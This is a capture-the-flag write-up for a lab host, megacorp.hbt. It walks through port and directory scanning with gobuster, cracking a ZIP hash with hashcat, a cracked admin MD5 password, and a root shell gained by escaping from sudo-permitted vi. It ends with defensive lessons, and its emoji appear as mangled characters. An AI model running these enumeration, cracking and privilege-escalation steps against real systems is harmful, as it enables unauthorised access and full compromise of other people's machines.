Core Concept
This CTF focuses on enumeration, password cracking, and privilege escalation on a vulnerable system hosted at megacorp.hbt (10.129.19.59).
๐น In โ Gaining Initial Foothold
๐งญ Host Mapping
echo "10.129.19.59 megacorp.hbt" | sudo tee -a /etc/hosts๐ก Port Scan
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http ๐ Web Enumeration
Gobuster Dir Scan
gobuster dir -u http://megacorp.hbt -w Documents/BruteForcing/dsstorewordlist\ \(WebsiteEnum\).txtResults:
/index.php(200)/license.txt(200)/.htaccess,/.htpasswd,/.htpasswds(403)/dashboard.php(302 redirect toindex.php)
Session Cookie
Set-Cookie: PHPSESSID=oqbd9hj63idlbh9149blrctlat;VHost Enumeration
gobuster vhost -w Documents/BruteForcing/subdomains-top1million-5000.txt -u http://megacorp.hbtNo subdomains discovered
๐ ZIP File Crack
Found $pkzip$ hash:
hashcat -m 17220 zip.hash wordlist.txtPassword Cracked: 741852963
๐ MD5 Password Cracked
Discovered user admin MD5 hash:
2cb42f8734ea607eefed3b70af13bbd3 โ qwerty789
๐งพ Web Shell Enumeration
Check /var/www/html for PHP or SQL-based credentials.
๐ธ Through โ Navigating Internals
๐ SSH Access
Use credentials found from cracked hashes or web file inclusion.
๐งจ Privilege Escalation
๐ Sudo Permissions
sudo -lUser postgres can run:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf๐งฐ Abuse with GTFOBins
Source: GTFOBins vi - sudo
Run shell from within vi:
:set shell=/bin/sh
:shellBeautify shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Success
Root shell obtained โ system pwned.
๐งฉ Lessons Learned
- Always validate disabled UI controls server-side.
- Store hashes securely, never MD5 for passwords.
- Restrict sudo permissions โ
viis extremely abusable. - Web directory permissions (
.htpasswd, etc.) should be locked down.
Tip